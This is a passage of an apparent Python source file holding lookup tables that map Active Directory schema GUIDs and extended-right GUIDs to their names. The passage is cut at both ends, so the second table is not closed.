"e3f3cb4e-0f20-42eb-9703-d2ff26e52667": "BootFile",
"649ac98d-9b9a-4d41-af6b-f616f2a62e4a": "ms-DS-Key-Approximate-Last-Logon-Time-Stamp",
"d167aa4b-8b08-11d2-9939-0000f87a57d4": "DS-Core-Propagation-Data",
"e1e9bad7-c6dd-4101-a843-794cec85b038": "ms-DS-Entry-Time-To-Die",
"c49b8be8-d34b-11d2-999a-0000f87a57d4": "MS-SQL-AllowSnapshotFilesFTPDownloading",
"3bcbfcf5-4d3d-11d0-a1a6-00c04fd930c9": "Print-Media-Ready",
"969d3c79-0e9a-4d95-b0ac-bdde7ff8f3a1": "NisMapName",
"f780acc1-56f0-11d1-a9c6-0000f80367c1": "Application-Settings",
"50776997-3c3d-11d2-90cc-00c04fd91ab1": "MSMQ-Migrated-User",
"f0f8ff86-1191-11d0-a060-00aa006c33ed": "DS-Heuristics",
"9d054a5a-d187-46c1-9d85-42dfc44a56dd": "ms-DS-ExecuteScriptPassword",
"c4e311fc-d34b-11d2-999a-0000f87a57d4": "MS-SQL-ThirdParty",
"244b296f-5abd-11d0-afd2-00c04fd930c9": "Print-Media-Supported",
"4a95216e-fcc0-402e-b57f-5971626148a9": "NisMapEntry",
"ee1f5543-7c2e-476a-8b3f-e11f4af6c498": "ms-DS-Key-Credential",
"ee8d0ae0-6f91-11d2-9905-0000f87a57d4": "DS-UI-Admin-Maximum",
"b92fd528-38ac-40d4-818d-0433380837c1": "ms-DS-External-Key",
"4cc4601e-7201-4141-abc8-3e529ae88863": "ms-TAPI-Conference-Blob",
"ba305f74-47e3-11d0-a1a6-00c04fd930c9": "Print-Memory",
"27eebfa2-fbeb-4f8e-aad6-c50247994291": "msSFU-30-Search-Container",
"19195a5c-6da0-11d0-afd3-00c04fd930c9": "Application-Site-Settings",
"9a0dc343-c100-11d1-bbc5-0080c76670c0": "MSMQ-Queue",
"938ad788-225f-4eee-93b9-ad24a159e1db": "ms-DS-Key-Credential-Link-BL",
"f6ea0a94-6f91-11d2-9905-0000f87a57d4": "DS-UI-Admin-Notification",
"604877cd-9cdb-47c7-b03d-3daadb044910": "ms-DS-External-Store",
"efd7d7f7-178e-4767-87fa-f8a16b840544": "ms-TAPI-Ip-Address",
"ba305f71-47e3-11d0-a1a6-00c04fd930c9": "Print-Min-X-Extent",
"32ecd698-ce9e-4894-a134-7ad76b082e83": "msSFU-30-Key-Attributes",
"bf967aba-0de6-11d0-a285-00aa003049e2": "User",
"fcca766a-6f91-11d2-9905-0000f87a57d4": "DS-UI-Shell-Maximum",
"9b88bda8-dd82-4998-a91d-5f2d2baf1927": "ms-DS-Optional-Feature-GUID",
"89c1ebcf-7a5f-41fd-99ca-c900b32299ab": "ms-TAPI-Protocol-Id",
"ba305f72-47e3-11d0-a1a6-00c04fd930c9": "Print-Min-Y-Extent",
"a2e11a42-e781-4ca1-a7fa-ec307f62b6a1": "msSFU-30-Field-Separator",
"ddc790ac-af4d-442a-8f0f-a1d4caa7dd92": "Application-Version",
"9a0dc347-c100-11d1-bbc5-0080c76670c0": "MSMQ-Settings",
"167757bc-47f3-11d1-a9c3-0000f80367c1": "DSA-Signature",
"fb00dcdf-ac37-483a-9c12-ac53a6603033": "ms-DS-Filter-Containers",
"70a4e7ea-b3b9-4643-8918-e6dd2471bfd4": "ms-TAPI-Unique-Identifier",
"ba305f79-47e3-11d0-a1a6-00c04fd930c9": "Print-Network-Address",
"95b2aef0-27e4-4cb9-880a-a2d9a9ea23b8": "msSFU-30-Intra-Field-Separator",
"5df2b673-6d41-4774-b3e8-d52e8ee9ff99": "ms-DS-Device",
"52458021-ca6a-11d0-afff-0000f80367c1": "Dynamic-LDAP-Server",
"11e9a5bc-4517-4049-af9c-51554fb0fc09": "ms-DS-Has-Instantiated-NCs",
"6366c0c1-6972-4e66-b3a5-1d52ad0c0547": "ms-WMI-Author",
"ba305f6a-47e3-11d0-a1a6-00c04fd930c9": "Print-Notify",
"ef9a2df0-2e57-48c8-8950-0cc674004733": "msSFU-30-Search-Attributes",
"9a0dc346-c100-11d1-bbc5-0080c76670c0": "MSMQ-Site-Link",
"5b47d60f-6090-40b2-9f37-2a4de88f3063": "ms-DS-Key-Credential-Link",
"bf967961-0de6-11d0-a285-00aa003049e2": "E-mail-Addresses",
"6f17e347-a842-4498-b8b3-15e007da4fed": "ms-DS-Has-Domain-NCs",
"f9cdf7a0-ec44-4937-a79b-cd91522b3aa8": "ms-WMI-ChangeDate",
"3bcbfcf4-4d3d-11d0-a1a6-00c04fd930c9": "Print-Number-Up",
"e167b0b6-4045-4433-ac35-53f972d45cba": "msSFU-30-Result-Attributes",
"bf967a81-0de6-11d0-a285-00aa003049e2": "Builtin-Domain",
"8e4eb2ec-4712-11d0-a1a0-00c04fd930c9": "EFSPolicy",
"ae2de0e2-59d7-4d47-8d47-ed4dfe4357ad": "ms-DS-Has-Master-NCs",
"90c1925f-4a24-4b07-b202-be32eb3c8b74": "ms-WMI-Class",
"281416d0-1968-11d0-a28f-00aa003049e2": "Print-Orientations-Supported",
"b7b16e01-024f-4e23-ad0d-71f1a406b684": "msSFU-30-Map-Filter",
"19195a60-6da0-11d0-afd3-00c04fd930c9": "NTDS-Connection",
"f2699093-f25a-4220-9deb-03df4cc4a9c5": "Dns-Zone-Scope-Container",
"bf967962-0de6-11d0-a285-00aa003049e2": "Employee-ID",
"80641043-15a2-40e1-92a2-8ca866f70776": "ms-DS-Host-Service-Account",
"2b9c0ebc-c272-45cb-99d2-4d0e691632e0": "ms-WMI-ClassDefinition",
"ba305f69-47e3-11d0-a1a6-00c04fd930c9": "Print-Owner",
"4cc908a2-9e18-410e-8459-f17cc422020a": "msSFU-30-Master-Server-Name",
"7d6c0e9d-7e20-11d0-afd6-00c04fd930c9": "Category-Registration",
"a8df73ef-c5ea-11d1-bbcb-0080c76670c0": "Employee-Number",
"79abe4eb-88f3-48e7-89d6-f4bc7e98c331": "ms-DS-Host-Service-Account-BL",
"748b0a2e-3351-4b3f-b171-2f17414ea779": "ms-WMI-CreationDate",
"19405b97-3cfa-11d1-a9c0-0000f80367c1": "Print-Pages-Per-Minute",
"02625f05-d1ee-4f9f-b366-55266becb95c": "msSFU-30-Order-Number",
"f0f8ffab-1191-11d0-a060-00aa006c33ed": "NTDS-DSA",
"696f8a61-2d3f-40ce-a4b3-e275dfcc49c5": "Dns-Zone-Scope",
"a8df73f0-c5ea-11d1-bbcb-0080c76670c0": "Employee-Type",
"7bc64cea-c04e-4318-b102-3e0729371a65": "ms-DS-Integer",
"50c8673a-8f56-4614-9308-9e1340fb9af3": "ms-WMI-Genus",
"ba305f77-47e3-11d0-a1a6-00c04fd930c9": "Print-Rate",
"16c5d1d3-35c2-4061-a870-a5cefda804f0": "msSFU-30-Name",
"3fdfee50-47f4-11d1-a9c3-0000f80367c1": "Certification-Authority",
"a8df73f2-c5ea-11d1-bbcb-0080c76670c0": "Enabled",
"bc60096a-1b47-4b30-8877-602c93f56532": "ms-DS-IntId",
"9339a803-94b8-47f7-9123-a853b9ff7e45": "ms-WMI-ID",
"ba305f78-47e3-11d0-a1a6-00c04fd930c9": "Print-Rate-Unit",
"20ebf171-c69a-4c31-b29d-dcb837d8912d": "msSFU-30-Aliases",
"85d16ec1-0791-4bc8-8ab3-70980602ff8c": "NTDS-DSA-RO",
"e0fa1e8c-9b45-11d0-afdd-00c04fd930c9": "Dns-Node",
"bf967963-0de6-11d0-a285-00aa003049e2": "Enabled-Connection",
"6fabdcda-8c53-204f-b1a4-9df0c67c1eb4": "ms-DS-Is-Possible-Values-Present",
"1b0c07f8-76dd-4060-a1e1-70084619dc90": "ms-WMI-intDefault",
"281416c6-1968-11d0-a28f-00aa003049e2": "Print-Separator-File",
"37830235-e5e9-46f2-922b-d8d44f03e7ae": "msSFU-30-Key-Values",
"bf967a82-0de6-11d0-a285-00aa003049e2": "Class-Registration",
"3417ab48-df24-4fb1-80b0-0fcb367e25e3": "ms-DS-Expire-Passwords-On-Smart-Card-Only-Accounts",
"2a39c5b3-8960-11d1-aebc-0000f80367c1": "Enrollment-Providers",
"1df5cf33-0fe5-499e-90e1-e94b42718a46": "ms-DS-isGC",
"18e006b9-6445-48e3-9dcf-b5ecfbc4df8e": "ms-WMI-intFlags1",
"ba305f68-47e3-11d0-a1a6-00c04fd930c9": "Print-Share-Name",
"9ee3b2e3-c7f3-45f8-8c9f-1382be4984d2": "msSFU-30-Nis-Domain",
"19195a5f-6da0-11d0-afd3-00c04fd930c9": "NTDS-Service",
"65650576-4699-4fc9-8d18-26e0cd0137a6": "ms-DS-Token-Group-Names",
"d213decc-d81a-4384-aac2-dcfcfd631cf8": "Entry-TTL",
"a8e8aa23-3e67-4af1-9d7a-2f1a1d633ac9": "ms-DS-isRODC",
"075a42c9-c55a-45b1-ac93-eb086b31f610": "ms-WMI-intFlags2",
"ba305f6c-47e3-11d0-a1a6-00c04fd930c9": "Print-Spooling",
"93095ed3-6f30-4bdd-b734-65d569f5f7c9": "msSFU-30-Domains",
"fa06d1f4-7922-4aad-b79c-b2201f54417c": "ms-DS-Token-Group-Names-Global-And-Universal",
"9a7ad947-ca53-11d1-bbd0-0080c76670c0": "Extended-Attribute-Info",
"8ab15858-683e-466d-877f-d640e1f9a611": "ms-DS-Last-Known-RDN",
"f29fa736-de09-4be4-b23a-e734c124bacc": "ms-WMI-intFlags3",
"ba305f73-47e3-11d0-a1a6-00c04fd930c9": "Print-Stapling-Supported",
"084a944b-e150-4bfe-9345-40e1aedaebba": "msSFU-30-Yp-Servers",
"bf967a84-0de6-11d0-a285-00aa003049e2": "Class-Store",
"19195a5d-6da0-11d0-afd3-00c04fd930c9": "NTDS-Site-Settings",
"523fc6c8-9af4-4a02-9cd7-3dea129eeb27": "ms-DS-Token-Group-Names-No-GC-Acceptable",
"bf967966-0de6-11d0-a285-00aa003049e2": "Extended-Chars-Allowed",
"c523e9c0-33b5-4ac8-8923-b57b927f42f6": "ms-DS-KeyVersionNumber",
"bd74a7ac-c493-4c9c-bdfa-5c7b119ca6b2": "ms-WMI-intFlags4",
"281416c9-1968-11d0-a28f-00aa003049e2": "Print-Start-Time",
"04ee6aa6-f83b-469a-bf5a-3c00d3634669": "msSFU-30-Max-Gid-Number",
"9a7ad948-ca53-11d1-bbd0-0080c76670c0": "Extended-Class-Info",
"ad7940f8-e43a-4a42-83bc-d688e59ea605": "ms-DS-Logon-Time-Sync-Interval",
"fb920c2c-f294-4426-8ac1-d24b42aa2bce": "ms-WMI-intMax",
"ba305f6b-47e3-11d0-a1a6-00c04fd930c9": "Print-Status",
"ec998437-d944-4a28-8500-217588adfc75": "msSFU-30-Max-Uid-Number",
"bf967a85-0de6-11d0-a285-00aa003049e2": "Com-Connection-Point",
"2a132586-9373-11d1-aebc-0000f80367c1": "NTFRS-Member",
"bf967ab0-0de6-11d0-a285-00aa003049e2": "Security-Principal",
"bf967972-0de6-11d0-a285-00aa003049e2": "Extension-Name",
"60234769-4819-4615-a1b2-49d2f119acb5": "ms-DS-Mastered-By",
"68c2e3ba-9837-4c70-98e0-f0c33695d023": "ms-WMI-intMin",
"244b296e-5abd-11d0-afd2-00c04fd930c9": "Printer-Name",
"585c9d5e-f599-4f07-9cf9-4373af4b89d3": "msSFU-30-NSMAP-Field-Position",
"7ece040f-9327-4cdc-aad3-037adfe62639": "ms-DS-User-Allowed-NTLM-Network-Authentication",
"d24e2846-1dd9-4bcf-99d7-a6227cc86da7": "Extra-Columns",
"fdd337f5-4999-4fce-b252-8ff9c9b43875": "ms-DS-Maximum-Password-Age",
"6af565f6-a749-4b72-9634-3c5d47e6b4e0": "ms-WMI-intValidValues",
"bf967a01-0de6-11d0-a285-00aa003049e2": "Prior-Set-Time",
"c875d82d-2848-4cec-bb50-3c5486d09d57": "msSFU-30-Posix-Member",
"bf967a86-0de6-11d0-a285-00aa003049e2": "Computer",
"5245803a-ca6a-11d0-afff-0000f80367c1": "NTFRS-Replica-Set",
"278947b9-5222-435e-96b7-1503858c2b48": "ms-DS-Service-Allowed-NTLM-Network-Authentication",
"bf967974-0de6-11d0-a285-00aa003049e2": "Facsimile-Telephone-Number",
"2a74f878-4d9c-49f9-97b3-6767d1cbd9a3": "ms-DS-Minimum-Password-Age",
"f4d8085a-8c5b-4785-959b-dc585566e445": "ms-WMI-int8Default",
"bf967a02-0de6-11d0-a285-00aa003049e2": "Prior-Value",
"7bd76b92-3244-438a-ada6-24f5ea34381e": "msSFU-30-Posix-Member-Of",
"aacd2170-482a-44c6-b66e-42c2f66a285c": "ms-DS-Strong-NTLM-Policy",
"d9e18315-8939-11d1-aebc-0000f80367c1": "File-Ext-Priority",
"b21b3439-4c3a-441c-bb5f-08f20e9b315e": "ms-DS-Minimum-Password-Length",
"e3d8b547-003d-4946-a32b-dc7cedc96b74": "ms-WMI-int8Max",
"281416c7-1968-11d0-a28f-00aa003049e2": "Priority",
"97d2bf65-0466-4852-a25a-ec20f57ee36c": "msSFU-30-Netgroup-Host-At-Domain",
"bf967a87-0de6-11d0-a285-00aa003049e2": "Configuration",
"f780acc2-56f0-11d1-a9c6-0000f80367c1": "NTFRS-Settings",
"bf967976-0de6-11d0-a285-00aa003049e2": "Flags",
"f9c9a57c-3941-438d-bebf-0edaf2aca187": "ms-DS-OIDToGroup-Link",
"ed1489d1-54cc-4066-b368-a00daa2664f1": "ms-WMI-int8Min",
"bf967a03-0de6-11d0-a285-00aa003049e2": "Private-Key",
"a9e84eed-e630-4b67-b4b3-cad2a82d345e": "msSFU-30-Netgroup-User-At-Domain",
"ab6a1156-4dc7-40f5-9180-8e4ce42fe5cd": "ms-DS-AuthN-Policy",
"b7b13117-b82e-11d0-afee-0000f80367c1": "Flat-Name",
"1a3d0d20-5844-4199-ad25-0f5039a76ada": "ms-DS-OIDToGroup-Link-BL",
"103519a9-c002-441b-981a-b0b3e012c803": "ms-WMI-int8ValidValues",
"19405b9a-3cfa-11d1-a9c0-0000f80367c1": "Privilege-Attributes",
"0dea42f5-278d-4157-b4a7-49b59664915b": "msSFU-30-Is-Valid-Container",
"5cb41ecf-0e4c-11d0-a286-00aa003049e2": "Connection-Point",
"2a132588-9373-11d1-aebc-0000f80367c1": "NTFRS-Subscriber",
"b002f407-1340-41eb-bca0-bd7d938e25a9": "ms-DS-Source-Anchor",
"bf967977-0de6-11d0-a285-00aa003049e2": "Force-Logoff",
"fed81bb7-768c-4c2f-9641-2245de34794d": "ms-DS-Password-History-Length",
"6736809f-2064-443e-a145-81262b1f1366": "ms-WMI-Mof",
"19405b98-3cfa-11d1-a9c0-0000f80367c1": "Privilege-Display-Name",
"4503d2a3-3d70-41b8-b077-dff123c15865": "msSFU-30-Crypt-Method",
"5cb41ed0-0e4c-11d0-a286-00aa003049e2": "Contact",
"34f6bdf5-2e79-4c3b-8e14-3d93b75aab89": "ms-DS-Object-SOA",
"3e97891e-8c01-11d0-afda-00c04fd930c9": "Foreign-Identifier",
"db68054b-c9c3-4bf0-b15b-0fb52552a610": "ms-DS-Password-Complexity-Enabled",
"c6c8ace5-7e81-42af-ad72-77412c5941c4": "ms-WMI-Name",
"19405b9b-3cfa-11d1-a9c0-0000f80367c1": "Privilege-Holder",
"e65c30db-316c-4060-a3a0-387b083f09cd": "ms-TS-Profile-Path",
"bf967aa7-0de6-11d0-a285-00aa003049e2": "Person",
"2a132587-9373-11d1-aebc-0000f80367c1": "NTFRS-Subscriptions",
"7bfdcb88-4807-11d1-a9c3-0000f80367c1": "Friendly-Names",
"75ccdd8f-af6c-4487-bb4b-69e4d38a959c": "ms-DS-Password-Reversible-Encryption-Enabled",
"eaba628f-eb8e-4fe9-83fc-693be695559b": "ms-WMI-NormalizedClass",
"19405b99-3cfa-11d1-a9c0-0000f80367c1": "Privilege-Value",
"5d3510f0-c4e7-4122-b91f-a20add90e246": "ms-TS-Home-Directory",
"bf967ab7-0de6-11d0-a285-00aa003049e2": "Top",
"9a7ad949-ca53-11d1-bbd0-0080c76670c0": "From-Entry",
"94f2800c-531f-4aeb-975d-48ac39fd8ca4": "ms-DS-Local-Effective-Deletion-Time",
"27e81485-b1b0-4a8b-bedd-ce19a837e26e": "ms-WMI-Parm1",
"d9e18317-8939-11d1-aebc-0000f80367c1": "Product-Code",
"5f0a24d9-dffa-4cd9-acbf-a0680c03731e": "ms-TS-Home-Drive",
"bf967a8b-0de6-11d0-a285-00aa003049e2": "Container",
"bf967aa3-0de6-11d0-a285-00aa003049e2": "Organization",
"bf967979-0de6-11d0-a285-00aa003049e2": "From-Server",
"4ad6016b-b0d2-4c9b-93b6-5964b17b968c": "ms-DS-Local-Effective-Recycle-Time",
"0003508e-9c42-4a76-a8f4-38bf64bab0de": "ms-WMI-Parm2",
"bf967a05-0de6-11d0-a285-00aa003049e2": "Profile-Path",
"3a0cd464-bc54-40e7-93ae-a646a6ecc4b4": "ms-TS-Allow-Logon",
"bf967aa4-0de6-11d0-a285-00aa003049e2": "Organizational-Person",
"bf967a90-0de6-11d0-a285-00aa003049e2": "Sam-Domain",
"2a132578-9373-11d1-aebc-0000f80367c1": "Frs-Computer-Reference",
"b05bda89-76af-468a-b892-1be55558ecc8": "ms-DS-Lockout-Observation-Window",
"45958fb6-52bd-48ce-9f9f-c2712d9f2bfc": "ms-WMI-Parm3",
"e1aea402-cd5b-11d0-afff-0000f80367c1": "Proxied-Object-Name",
"15177226-8642-468b-8c48-03ddfd004982": "ms-TS-Remote-Control",
"8297931e-86d3-11d0-afda-00c04fd930c9": "Control-Access-Right",
"2a132579-9373-11d1-aebc-0000f80367c1": "Frs-Computer-Reference-BL",
"421f889a-472e-4fe4-8eb9-e1d0bc6071b2": "ms-DS-Lockout-Duration",
"3800d5a3-f1ce-4b82-a59a-1528ea795f59": "ms-WMI-Parm4",
"bf967a06-0de6-11d0-a285-00aa003049e2": "Proxy-Addresses",
"326f7089-53d8-4784-b814-46d8535110d2": "ms-TS-Max-Disconnection-Time",
"a8df74bf-c5ea-11d1-bbcb-0080c76670c0": "Organizational-Role",
"2a13257a-9373-11d1-aebc-0000f80367c1": "FRS-Control-Data-Creation",
"b8c8c35e-4a19-4a95-99d0-69fe4446286f": "ms-DS-Lockout-Threshold",
"ab920883-e7f8-4d72-b4a0-c0449897509d": "ms-WMI-PropertyName",
"5fd424d6-1262-11d0-a060-00aa006c33ed": "Proxy-Generation-Enabled",
"1d960ee2-6464-4e95-a781-e3b5cd5f9588": "ms-TS-Max-Connection-Time",
"bf967a8c-0de6-11d0-a285-00aa003049e2": "Country",
"2a13257b-9373-11d1-aebc-0000f80367c1": "FRS-Control-Inbound-Backlog",
"64c80f48-cdd2-4881-a86d-4e97b6f561fc": "ms-DS-PSO-Applies-To",
"65fff93e-35e3-45a3-85ae-876c6718297f": "ms-WMI-Query",
"bf967a07-0de6-11d0-a285-00aa003049e2": "Proxy-Lifetime",
"ff739e9c-6bb7-460e-b221-e250f3de0f95": "ms-TS-Max-Idle-Time",
"bf967aa5-0de6-11d0-a285-00aa003049e2": "Organizational-Unit",
"2a13257c-9373-11d1-aebc-0000f80367c1": "FRS-Control-Outbound-Backlog",
"5e6cf031-bda8-43c8-aca4-8fee4127005b": "ms-DS-PSO-Applied",
"7d3cfa98-c17b-4254-8bd7-4de9b932a345": "ms-WMI-QueryLanguage",
"80a67e28-9f22-11d0-afdd-00c04fd930c9": "Public-Key-Policy",
"366ed7ca-3e18-4c7f-abae-351a01e4b4f7": "ms-TS-Reconnection-Action",
"167758ca-47f3-11d1-a9c3-0000f80367c1": "CRL-Distribution-Point",
"1be8f171-a9ff-11d0-afe2-00c04fd930c9": "FRS-Directory-Filter",
"eadd3dfe-ae0e-4cc2-b9b9-5fe5b6ed2dd2": "ms-DS-Required-Domain-Behavior-Version",
"87b78d51-405f-4b7f-80ed-2bd28786f48d": "ms-WMI-ScopeGuid",
"b4b54e50-943a-11d1-aebd-0000f80367c1": "Purported-Search",
"1cf41bba-5604-463e-94d6-1a1287b72ca3": "ms-TS-Broken-Connection-Action",
"bf967aa6-0de6-11d0-a285-00aa003049e2": "Package-Registration",
"1be8f177-a9ff-11d0-afe2-00c04fd930c9": "FRS-DS-Poll",
"4beca2e8-a653-41b2-8fee-721575474bec": "ms-DS-Required-Forest-Behavior-Version",
"34f7ed6c-615d-418d-aa00-549a7d7be03e": "ms-WMI-SourceOrganization",
"bf967a09-0de6-11d0-a285-00aa003049e2": "Pwd-History-Length",
"23572aaf-29dd-44ea-b0fa-7e8438b9a4a3": "ms-TS-Connect-Client-Drives",
"bf967a8d-0de6-11d0-a285-00aa003049e2": "Cross-Ref",
"52458020-ca6a-11d0-afff-0000f80367c1": "FRS-Extensions",
"b77ea093-88d0-4780-9a98-911f8e8b1dca": "ms-DS-Resultant-PSO",
"152e42b6-37c5-4f55-ab48-1606384a9aea": "ms-WMI-stringDefault",
"bf967a0a-0de6-11d0-a285-00aa003049e2": "Pwd-Last-Set",
"8ce6a937-871b-4c92-b285-d99d4036681c": "ms-TS-Connect-Printer-Drives",
"1be8f178-a9ff-11d0-afe2-00c04fd930c9": "FRS-Fault-Condition",
"456374ac-1f0a-4617-93cf-bc55a7c9d341": "ms-DS-Password-Settings-Precedence",
"37609d31-a2bf-4b58-8f53-2b64e57a076d": "ms-WMI-stringValidValues",
"bf967a0b-0de6-11d0-a285-00aa003049e2": "Pwd-Properties",
"c0ffe2bd-cacf-4dc7-88d5-61e9e95766f6": "ms-TS-Default-To-Main-Printer",
"ef9e60e0-56f7-11d1-a9c6-0000f80367c1": "Cross-Ref-Container",
"b7b13122-b82e-11d0-afee-0000f80367c1": "Physical-Location",
"1be8f170-a9ff-11d0-afe2-00c04fd930c9": "FRS-File-Filter",
"d1e169a4-ebe9-49bf-8fcb-8aef3874592d": "ms-DS-Max-Values",
"95b6d8d6-c9e8-4661-a2bc-6a5cabc04c62": "ms-WMI-TargetClass",
"80a67e4e-9f22-11d0-afdd-00c04fd930c9": "Quality-Of-Service",
"a744f666-3d3c-4cc8-834b-9d4f6f687b8b": "ms-TS-Work-Directory",
"2a13257d-9373-11d1-aebc-0000f80367c1": "FRS-Flags",
"cbf7e6cd-85a4-4314-8939-8bfe80597835": "ms-DS-Members-For-Az-Role",
"1c4ab61f-3420-44e5-849d-8b5dbf60feb7": "ms-WMI-TargetNameSpace",
"cbf70a26-7e78-11d2-9921-0000f87a57d4": "Query-Filter",
"9201ac6f-1d69-4dfb-802e-d95510109599": "ms-TS-Initial-Program",
"bf967a8e-0de6-11d0-a285-00aa003049e2": "Device",
"e5209ca2-3bba-11d2-90cc-00c04fd91ab1": "PKI-Certificate-Template",
"5245801e-ca6a-11d0-afff-0000f80367c1": "FRS-Level-Limit",
"ececcd20-a7e0-4688-9ccf-02ece5e287f5": "ms-DS-Members-For-Az-Role-BL",
"c44f67a5-7de5-4a1f-92d9-662b57364b77": "ms-WMI-TargetObject",
"e1aea404-cd5b-11d0-afff-0000f80367c1": "Query-Policy-BL",
"40e1c407-4344-40f3-ab43-3625a34a63a2": "ms-TS-Endpoint-Data",
"2a13257e-9373-11d1-aebc-0000f80367c1": "FRS-Member-Reference",
"5a2eacd7-cc2b-48cf-9d9a-b6f1a0024de9": "ms-DS-NC-Type",
"5006a79a-6bfe-4561-9f52-13cf4dd3e560": "ms-WMI-TargetPath",
"e1aea403-cd5b-11d0-afff-0000f80367c1": "Query-Policy-Object",
"377ade80-e2d8-46c5-9bcd-6d9dec93b35e": "ms-TS-Endpoint-Type",
"8447f9f2-1027-11d0-a05f-00aa006c33ed": "Dfs-Configuration",
"ee4aa692-3bba-11d2-90cc-00c04fd91ab1": "PKI-Enrollment-Service",
"2a13257f-9373-11d1-aebc-0000f80367c1": "FRS-Member-Reference-BL",
"cafcb1de-f23c-46b5-adf7-1e64957bd5db": "ms-DS-Non-Members",
"ca2a281e-262b-4ff7-b419-bc123352a4e9": "ms-WMI-TargetType",
"7bfdcb86-4807-11d1-a9c3-0000f80367c1": "QueryPoint",
"3c08b569-801f-4158-b17b-e363d6ae696a": "ms-TS-Endpoint-Plugin",
}
EXTENDED_RIGHTS = {
"ab721a52-1e2f-11d0-9819-00aa0040529b": "Domain-Administer-Server",
"ab721a53-1e2f-11d0-9819-00aa0040529b": "User-Change-Password",
"00299570-246d-11d0-a768-00aa006e0529": "User-Force-Change-Password",
"ab721a55-1e2f-11d0-9819-00aa0040529b": "Send-To",
"c7407360-20bf-11d0-a768-00aa006e0529": "Domain-Password",
"59ba2f42-79a2-11d0-9020-00c04fc2d3cf": "General-Information",
"4c164200-20c0-11d0-a768-00aa006e0529": "User-Account-Restrictions",
"5f202010-79a5-11d0-9020-00c04fc2d4cf": "User-Logon",
"bc0ac240-79a9-11d0-9020-00c04fc2d4cf": "Membership",
"a1990816-4298-11d1-ade2-00c04fd8d5cd": "Open-Address-Book",
"e45795b2-9455-11d1-aebd-0000f80367c1": "Email-Information",
"e45795b3-9455-11d1-aebd-0000f80367c1": "Web-Information",
"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
"1131f6ab-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Synchronize",
"1131f6ac-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Manage-Topology",
"e12b56b6-0a95-11d1-adbb-00c04fd8d5cd": "Change-Schema-Master",
"d58d5f36-0a98-11d1-adbb-00c04fd8d5cd": "Change-Rid-Master",
"fec364e0-0a98-11d1-adbb-00c04fd8d5cd": "Do-Garbage-Collection",
"0bc1554e-0a99-11d1-adbb-00c04fd8d5cd": "Recalculate-Hierarchy",
"1abd7cf8-0a99-11d1-adbb-00c04fd8d5cd": "Allocate-Rids",
"bae50096-4752-11d1-9052-00c04fc2d4cf": "Change-PDC",
"440820ad-65b4-11d1-a3da-0000f875ae0d": "Add-GUID",
"014bf69c-7b3b-11d1-85f6-08002be74fab": "Change-Domain-Master",
"4b6e08c0-df3c-11d1-9c86-006008764d0e": "msmq-Receive-Dead-Letter",
"4b6e08c1-df3c-11d1-9c86-006008764d0e": "msmq-Peek-Dead-Letter",
"4b6e08c2-df3c-11d1-9c86-006008764d0e": "msmq-Receive-computer-Journal",
"4b6e08c3-df3c-11d1-9c86-006008764d0e": "msmq-Peek-computer-Journal",
"06bd3200-df3e-11d1-9c86-006008764d0e": "msmq-Receive",
"06bd3201-df3e-11d1-9c86-006008764d0e": "msmq-Peek",
"06bd3202-df3e-11d1-9c86-006008764d0e": "msmq-Send",
"06bd3203-df3e-11d1-9c86-006008764d0e": "msmq-Receive-journal",
"b4e60130-df3f-11d1-9c86-006008764d0e": "msmq-Open-Connector",
"edacfd8f-ffb3-11d1-b41d-00a0c968f939": "Apply-Group-Policy",
"037088f8-0ae1-11d2-b422-00a0c968f939": "RAS-Information",
"9923a32a-3607-11d2-b9be-0000f87a36b2": "DS-Install-Replica",
"cc17b1fb-33d9-11d2-97d4-00c04fd8d5cd": "Change-Infrastructure-Master",
"be2bb760-7f46-11d2-b9ad-00c04f79f805": "Update-Schema-Cache",
"62dd28a8-7f46-11d2-b9ad-00c04f79f805": "Recalculate-Security-Inheritance",
"69ae6200-7f46-11d2-b9ad-00c04f79f805": "DS-Check-Stale-Phantoms",
"0e10c968-78fb-11d2-90d4-00c04f79dc55": "Certificate-Enrollment",
"bf9679c0-0de6-11d0-a285-00aa003049e2": "Self-Membership",
"72e39547-7b18-11d1-adef-00c04fd8d5cd": "Validated-DNS-Host-Name",
"b7b1b3dd-ab09-4242-9e30-9980e5d322f7": "Generate-RSoP-Planning",
"9432c620-033c-4db7-8b58-14ef6d0bf477": "Refresh-Group-Cache",
"91d67418-0135-4acc-8d79-c08e857cfbec": "SAM-Enumerate-Entire-Domain",
"b7b1b3de-ab09-4242-9e30-9980e5d322f7": "Generate-RSoP-Logging",
"b8119fd0-04f6-4762-ab7a-4986c76b3f9a": "Domain-Other-Parameters",
"e2a36dc9-ae17-47c3-b58b-be34c55ba633": "Create-Inbound-Forest-Trust",
"1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
"ba33815a-4f93-4c76-87f3-57574bff8109": "Migrate-SID-History",
"45ec5156-db7e-47bb-b53f-dbeb2d03c40f": "Reanimate-Tombstones",
"2f16c4a5-b98e-432c-952a-cb388ba33f2e": "DS-Execute-Intentions-Script",
"f98340fb-7c5b-4cdb-a00b-2ebdfa115a96": "DS-Replication-Monitor-Topology",
"280f369c-67c7-438e-ae98-1d46f3c6f541": "Update-Password-Not-Required-Bit",
"ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501": "Unexpire-Password",
"05c74c5e-4deb-43b4-bd9f-86664c2a7fd5": "Enable-Per-User-Reversibly-Encrypted-Password",
"4ecc03fe-ffc0-4947-b630-eb672a8a9dbc": "DS-Query-Self-Quota",
"91e647de-d96f-4b70-9557-d63ff4f3ccd8": "Private-Information",
"1131f6ae-9c07-11d1-f79f-00c04fc2dcd2": "Read-Only-Replication-Secret-Synchronization",
"5805bc62-bdc9-4428-a5e2-856a0f4c185e": "Terminal-Server-License-Server",
"1a60ea8d-58a6-4b20-bcdc-fb71eb8a9ff8": "Reload-SSL-Certificate",
"89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
"7726b9d5-a4b4-4288-a6b2-dce952e80a7f": "Run-Protect-Admin-Groups-Task",
"7c0e2a7c-a419-48e4-a995-10180aad54dd": "Manage-Optional-Features",
"3e0f7e18-2c7a-4c10-ba82-4d926db99a3e": "DS-Clone-Domain-Controller",
"d31a8757-2447-4545-8081-3bb610cacbf2": "Validated-MS-DS-Behavior-Version",
"80863791-dbe9-4eb8-837e-7f0ab55d9ac7": "Validated-MS-DS-Additional-DNS-Host-Name",
